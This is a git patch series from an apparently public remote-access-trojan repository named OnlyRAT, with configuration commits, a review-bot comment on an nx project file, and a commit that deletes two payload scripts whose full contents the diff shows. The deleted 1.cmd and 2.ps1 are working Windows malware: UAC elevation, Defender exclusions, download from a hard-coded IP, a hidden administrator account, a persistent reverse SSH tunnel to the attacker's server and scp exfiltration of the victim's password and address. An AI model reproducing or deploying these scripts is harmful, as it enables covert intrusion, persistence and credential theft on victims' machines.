From f02fe1e98785736b261149ec8887db231d70b8e7 Mon Sep 17 00:00:00 2001
From: "mend-bolt-for-github[bot]" <42819689+mend-bolt-for-github[bot]@users.noreply.github.com>
Date: Sun, 13 Nov 2022 01:39:25 +0000
Subject: [PATCH 1/5] Add .whitesource configuration file
---
.whitesource | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 .whitesource
diff --git a/.whitesource b/.whitesource
new file mode 100644
index 0000000..9c7ae90
--- /dev/null
+++ b/.whitesource
@@ -0,0 +1,14 @@
+{
+ "scanSettings": {
+ "baseBranches": []
+ },
+ "checkRunSettings": {
+ "vulnerableCheckRunConclusionLevel": "failure",
+ "displayMode": "diff",
+ "useMendCheckNames": true
+ },
+ "issueSettings": {
+ "minSeverityLevel": "LOW",
+ "issueType": "DEPENDENCY"
+ }
+}
\ No newline at end of file
From becf41886a85c29097a1efb361c04bb6865b6706 Mon Sep 17 00:00:00 2001
From: CleanThat
Date: Thu, 22 Dec 2022 16:33:33 +0000
Subject: [PATCH 2/5] Add default Cleanthat configuration
---
cleanthat.yaml | 15 +++++++++++++++
1 file changed, 15 insertions(+)
create mode 100644 cleanthat.yaml
diff --git a/cleanthat.yaml b/cleanthat.yaml
new file mode 100644
index 0000000..85a6f9f
--- /dev/null
+++ b/cleanthat.yaml
@@ -0,0 +1,15 @@
+syntax_version: "2021-08-02"
+meta:
+ labels:
+ - "cleanthat"
+ refs:
+ branches:
+ - "refs/heads/develop"
+ - "refs/heads/main"
+ - "refs/heads/master"
+source_code:
+ excludes: []
+ includes: []
+ encoding: "UTF-8"
+ line_ending: "UNKNOWN"
+languages: []
From 7e84f30fddcc4516ffa1ddfca9b02d693a6a0918 Mon Sep 17 00:00:00 2001
From: akax <32862241+joseguzman1337@users.noreply.github.com> Date: Tue, 6 Jan 2026 07:45:05 +0800 Subject: [PATCH 3/5] Add macOS system files to .gitignore MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Add .DS_Store pattern to ignore macOS folder metadata - Add ._* pattern to ignore AppleDouble files 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Sonnet 4.5 --- .gitignore | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.gitignore b/.gitignore index 0360df6..233a62a 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,7 @@ payloads/1.cmd payloads/2.ps1 partition.sh cosmo.rat + +# macOS system files +.DS_Store +._* From d1a96e5959cf23724c17b393409ec25b8e969913 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Wed, 18 Mar 2026 16:45:31 -0500 Subject: [PATCH 4/5] chore: automated swarm-wide synchronization Co-Authored-By: Claude Sonnet 4.6 --- partition.sh | 7 ----- payloads/1.cmd | 33 ---------------------- payloads/2.ps1 | 75 -------------------------------------------------- 3 files changed, 115 deletions(-) delete mode 100644 partition.sh delete mode 100644 payloads/1.cmd delete mode 100644 payloads/2.ps1 diff --git a/partition.sh b/partition.sh deleted file mode 100644 index 6033326..0000000 --- a/partition.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -# partitions onlyrat -# created by : C0SM0 - -rm -rf /home/bluecosmo/.OnlyRAT -rm -rf /home/bluecosmo/.MK01-OnlyRAT -cp -r /home/bluecosmo/development/marks/mk01-onlyrat/ /home/bluecosmo/.MK01-OnlyRAT diff --git a/payloads/1.cmd b/payloads/1.cmd deleted file mode 100644 index 70cad26..0000000 --- a/payloads/1.cmd +++ /dev/null 
@@ -1,33 +0,0 @@ -@REM TODO: add UAC bypass dumbass - -@REM change me -set "EcSjRhAguo=45.61.56.252" - -@echo off -:: BatchGotAdmin -:------------------------------------- -if "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( ->nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" -) else ( ->nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system") -if '%errorlevel%' NEQ '0' ( - echo Requesting administrative privileges... - goto UACPrompt -) else ( goto gotAdmin ) - -:UACPrompt - echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" - set params= %* - echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" - - "%temp%\getadmin.vbs" - del "%temp%\getadmin.vbs" - exit /B - -:gotAdmin - pushd "%CD%" - CD /D "%~dp0" - -powershell powershell.exe -windowstyle hidden "Invoke-WebRequest -Uri %EcSjRhAguo%/onlyrat/payloads/2.ps1 -OutFile KFPGaEYdcz.ps1"; Add-MpPreference -ExclusionPath "C:/Users/%username%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"; Add-MpPreference -ExclusionPath "$env:temp" -powershell powershell.exe -windowstyle hidden -ep bypass ./KFPGaEYdcz.ps1 -del wEaoFkNduy.cmd \ No newline at end of file diff --git a/payloads/2.ps1 b/payloads/2.ps1 deleted file mode 100644 index 8a7ccbd..0000000 --- a/payloads/2.ps1 +++ /dev/null 
@@ -1,75 +0,0 @@ -# TODO: incorporate necessary payload installs - -$nkowFESgaO = "wraith" # change me, vps username -$ecPlmJVLRo = "45.61.56.252" # change me. vps ip address -$YlEQgBmePn = "5656" # change me, vps port [NOT DEFAULT SSH PORT] - -$dERQpoZWxz = "$nkowFESgaO@$ecPlmJVLRo" - -function RpLGWiUsIy { - return -join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_}) -} - -function geIwCZloBx { - [CmdletBinding()] - param ( - [string] $sqbXFdLvyw, - [securestring] $CBFXIYeWPR - ) - begin { - } - process { - New-LocalUser "$sqbXFdLvyw" -Password $CBFXIYeWPR -FullName "$sqbXFdLvyw" -Description "Temporary local admin" - Write-Verbose "$sqbXFdLvyw local user crated" - Add-LocalGroupMember -Group "Administrators" -Member "$sqbXFdLvyw" - Write-Verbose "$sqbXFdLvyw added to the local administrator group" - } - end { - } -} - -# make admin -$sqbXFdLvyw = "onlyrat" -$DCilJFugpP = RpLGWiUsIy -Remove-LocalUser -Name $sqbXFdLvyw -$CBFXIYeWPR = (ConvertTo-SecureString $DCilJFugpP -AsPlainText -Force) -geIwCZloBx -sqbXFdLvyw $sqbXFdLvyw -CBFXIYeWPR $CBFXIYeWPR - -# registry -Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name $sqbXFdLvyw -Value 0 -Type DWORD -Force - -# ssh -Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 -Start-Service sshd -Set-Service -Name sshd -StartupType 'Automatic' - -# startup file -# TODO: registry startup -$GlNweBEFmh = RpLGWiUsIy -$NyZnoLKCIs = Get-Location -Add-Content -Path "$NyZnoLKCIs/$GlNweBEFmh.cmd" -Value "@echo off" -Add-Content -Path "$NyZnoLKCIs/$GlNweBEFmh.cmd" -Value "powershell powershell.exe -windowstyle hidden -ep bypass `"ssh -o ServerAliveInterval=30 -R $YlEQgBmePn`:localhost:22 $dERQpoZWxz -i $env:temp\key`"" - -# rat file -$CRYnrkaDbe = "$env:UserName.rat" -$AhdjktGyiZ = (Get-NetIPConfiguration | Where-Object { $_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"}).IPv4Address.IPAddress - -Add-Content 
-Path $CRYnrkaDbe -Value $AhdjktGyiZ # local ip addr -Add-Content -Path $CRYnrkaDbe -Value $DCilJFugpP # pass -Add-Content -Path $CRYnrkaDbe -Value $env:temp # temp -Add-Content -Path $CRYnrkaDbe -Value $NyZnoLKCIs # startup -Add-Content -Path $CRYnrkaDbe -Value $ecPlmJVLRo # remote host -Add-Content -Path $CRYnrkaDbe -Value $YlEQgBmePn # remote port -Add-Content -Path $CRYnrkaDbe -Value 'remote' # connection type - -# get key and sent rat -Invoke-WebRequest -Uri "http://$ecPlmJVLRo/onlyrat.key" -OutFile "$env:temp\key" -scp -i $env:temp\key -r $CRYnrkaDbe $dERQpoZWxz`:/home/$nkowFESgaO - -# cleanup -Set-Location C:\Users -attrib +h +s +r onlyrat -Set-Location $NyZnoLKCIs -Remove-Item $CRYnrkaDbe -Remove-Item KFPGaEYdcz.ps1 -start "./$GlNweBEFmh.cmd" \ No newline at end of file From adf9e90e60ea16a9a73e1f1ac04c19c0ac3b5b05 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Tue, 31 Mar 2026 07:39:25 -0500 Subject: [PATCH 5/5] [CRUSH] chore(repo): checkpoint pending changes #TASK-000 --- project.json | 47 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 project.json diff --git a/project.json b/project.json new file mode 100644 index 0000000..ce084c8 --- /dev/null +++ b/project.json 
@@ -0,0 +1,47 @@
+{
+ "name": "repo-repos-onlyrat",
+ "root": "repos/OnlyRAT",
+ "projectType": "library",
+ "targets": {
+ "status": {
+ "executor": "nx:run-commands",
+ "options": {
+ "command": "git -C repos/OnlyRAT status --short || true"
+ },
+ "metadata": {
+ "supervisorRequired": true
+ }
+ },
+ "fetch": {
+ "executor": "nx:run-commands",
+ "options": {
+ "command": "git -C repos/OnlyRAT fetch --all --prune || true"
+ },
+ "metadata": {
+ "supervisorRequired": true
+ }
+ },
+ "log": {
+ "executor": "nx:run-commands",
+ "options": {
+ "command": "git -C repos/OnlyRAT log --oneline -10 || true"
+ },
+ "metadata": {
+ "supervisorRequired": true
+ }
+ },
+ "manifests": {
+ "executor": "nx:run-commands",
+ "options": {
+ "command": "find repos/OnlyRAT \\( -name package.json -o -name pyproject.toml -o -name Cargo.toml -o -name go.mod -o -name setup.py \\) -not -path '*/node_modules/*' -not -path '*/testdata/*' -not -path '*/fixtures/*' -print | sort"
+ },
+ "metadata": {
+ "supervisorRequired": true
+ }
+ }
+ },
+ "tags": [
+ "scope:repos",
+ "type:subrepo"
+ ]
+}
\ No newline at end of file
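Review bot: The `status`, `fetch` and `log` targets each end their command with `|| true`, so the nx target reports success even when the `git -C repos/OnlyRAT ...` call fails (missing directory, unreachable remote, damaged repository); `manifests` has no such suffix, so the four targets are also inconsistent with each other. For `fetch` in particular a swallowed failure leaves stale refs behind a green run, and whatever consumes `supervisorRequired` is not visible in this patch, so confirm how it treats exit status. I would drop the suffix, e.g. `"command": "git -C repos/OnlyRAT fetch --all --prune"`, and keep `|| true` only where a non-zero exit is genuinely expected. Separately, the file ends without a trailing newline, and `root` points at `repos/OnlyRAT` from inside what appears to be that same repository, which suggests this file belongs in the parent workspace rather than in this tree.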